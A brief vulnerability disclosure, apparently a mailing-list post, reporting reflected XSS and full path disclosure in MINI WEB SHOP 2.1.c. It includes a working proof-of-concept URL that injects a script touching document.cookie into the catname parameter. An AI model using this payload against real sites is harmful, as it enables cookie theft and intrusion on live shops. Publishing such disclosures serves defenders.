Hello Vulnerable : MINI WEB SHOP Version: 2.1.c web : http://ObieWebsite.SourceForge.net I Found some bugs ( XSS & Full Path Disclosure ) in MINI WEB SHOP XSS : http://example.com/miniwebshop/modules/viewcategory.php?catname='><script>alert(document.cookie)</script> Full Path Disclosure : http://example.com/miniwebshop/modules/viewcategory.php?catname=[anything] Discovery by Linux_Drox ( Qptan ) Linux_Drox@xxxxxxxxxxxx www.LeZr.Com/vb Best Regards ,,,